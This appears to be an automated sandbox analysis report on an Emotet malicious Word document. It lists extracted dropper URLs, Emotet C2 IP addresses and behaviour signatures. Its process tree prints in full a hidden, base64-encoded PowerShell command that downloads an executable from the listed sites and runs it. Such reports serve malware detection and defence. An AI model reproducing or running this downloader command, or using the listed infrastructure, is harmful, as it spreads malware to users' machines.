Analysis

  • max time kernel
    27s
  • resource
    win10v191014
  • submitted
    22-01-2020 15:07

General

  • Target

    074ec6f9a2776114bc1d9e2da2250b73417843b3357ada6f17a5f4b606ab9a91

  • Sample

    200122-8sdwrbvmfj

  • SHA256

    074ec6f9a2776114bc1d9e2da2250b73417843b3357ada6f17a5f4b606ab9a91

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://cxlit.com/wp-admin/SjM/

exe.dropper

http://johncharlesdental.com.au/wp-content/6DVi/

exe.dropper

http://www.kongtoubi.org/wp-includes/hiLAx/

exe.dropper

http://maruka-dev.herokuapp.com/wp-includes/msuft/

exe.dropper

http://ceylonsri.com/cgi-bin/5n6jdz/

Extracted

Family

emotet

C2

68.114.229.171:80

74.101.225.121:443

152.168.248.128:443

217.160.19.232:8080

176.9.43.37:8080

5.199.130.105:7080

37.187.72.193:8080

68.172.243.146:80

181.143.126.170:80

108.191.2.72:80

85.152.174.56:80

101.187.197.33:443

121.88.5.176:443

189.203.177.41:443

78.186.5.109:443

66.34.201.20:7080

209.141.54.221:8080

181.126.70.117:80

87.106.136.232:8080

181.13.24.82:80

rsa_pubkey.plain

Signatures

  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\074ec6f9a2776114bc1d9e2da2250b73417843b3357ada6f17a5f4b606ab9a91.doc" /o ""
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Enumerates system info in registry
    • Checks processor information in registry
    • Suspicious behavior: AddClipboardFormatListener
    PID:4976
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABXAGcAeQBnAGIAawBsAGgAcABvAGkAZgA9ACcARQB1AGMAYwBnAHkAZgBmAGMAeQAnADsAJABEAGEAYgBkAG0AcQB1AG0AYQBkACAAPQAgACcANQA4ADAAJwA7ACQATwBxAGkAYwBlAHgAbQBiAHEAeABrAGcAYgA9ACcAVwBwAHMAdwBtAGIAbQBhAGoAJwA7ACQAWQBoAHgAeAB2AHIAaABtAGwAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEQAYQBiAGQAbQBxAHUAbQBhAGQAKwAnAC4AZQB4AGUAJwA7ACQAQwBvAHEAZABhAHIAagBvAHcAcgBoAGwAZAA9ACcASgBuAHcAcgB3AGUAeQBhACcAOwAkAFIAawBnAGsAdwBrAG0AbwBtAHgAeAB3AD0AJgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAGUAVAAuAFcARQBCAGMAbABJAEUAbgB0ADsAJABTAGoAcgBxAGQAeABpAGIAcAB1AGsAPQAnAGgAdAB0AHAAOgAvAC8AYwB4AGwAaQB0AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBTAGoATQAvACoAaAB0AHQAcAA6AC8ALwBqAG8AaABuAGMAaABhAHIAbABlAHMAZABlAG4AdABhAGwALgBjAG8AbQAuAGEAdQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA2AEQAVgBpAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AawBvAG4AZwB0AG8AdQBiAGkALgBvAHIAZwAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGgAaQBMAEEAeAAvACoAaAB0AHQAcAA6AC8ALwBtAGEAcgB1AGsAYQAtAGQAZQB2AC4AaABlAHIAbwBrAHUAYQBwAHAALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAG0AcwB1AGYAdAAvACoAaAB0AHQAcAA6AC8ALwBjAGUAeQBsAG8AbgBzAHIAaQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADUAbgA2AGoAZAB6AC8AJwAuACIAcwBQAGwAYABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABGAHMAZgB2AGMAcQB5AGYAaQB2AHkAPQAnAFgAdAB4AG4AZABvAHAAZABwAHAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMAcwBnAHoAcQB2AGkAZgBsAHUAIABpAG4AIAAkAFMAagByAHEAZAB4AGkAYgBwAHUAawApAHsAdAByAHkAewAkAFIAawBnAGsAdwBrAG0AbwBtAHgAeAB3AC4AIgBEAG8AYABXAG4ATABPAEEAYABEAGYAaQBMAGUAIgAoACQAUwBzAGcAegBxAHYAaQBmAGwAdQAsACAAJABZAGgAeAB4AHYAcgBoAG0AbAApADsAJABZAGQAcgBhAHMAZABvAGgAcQB1AHoAZQA9ACcAQQBpAGcAdgBsAGYAeQBiAHkAeQB6AHIAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABZAGgAeAB4AHYAcgBoAG0AbAApAC4AIgBsAGAAZQBuAEcAYABUAGgAIgAgAC0AZwBlACAAMwA1ADcAOAA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABgAEEAUgBUACIAKAAkAFkAaAB4AHgAdgByAGgAbQBsACkAOwAkAEoAcQBjAHYAZABlAG0AaABlAHEAcwBqAD0AJwBEAHQAcwB1AGsAbgBoAHgAdABlAGUAcwB4ACcAOwBiAHIAZQBhAGsAOwAkAEIAYQBqAGMAbgBnAGUAeABpAHAAbwBvAD0AJwBGAHMAdgB1AGUAdgBmAGcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQBtAG0AdwB4AHIAawBoAGgAbwA9ACcASgBnAHEAcQB6AHYAawBlAHYAegBmACcA
    1⤵
    • Suspicious use of WriteProcessMemory
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:3336
    • C:\Users\Admin\580.exe
      "C:\Users\Admin\580.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:3848
      • C:\Users\Admin\580.exe
        --f8a0020b
        3⤵
        • Drops file in System32 directory
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:4368

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3848-9-0x0000000002200000-0x0000000002215000-memory.dmp

    Filesize

    84KB

  • memory/4368-11-0x00000000006D0000-0x00000000006E5000-memory.dmp

    Filesize

    84KB

  • memory/4368-12-0x0000000000400000-0x000000000047D000-memory.dmp

    Filesize

    500KB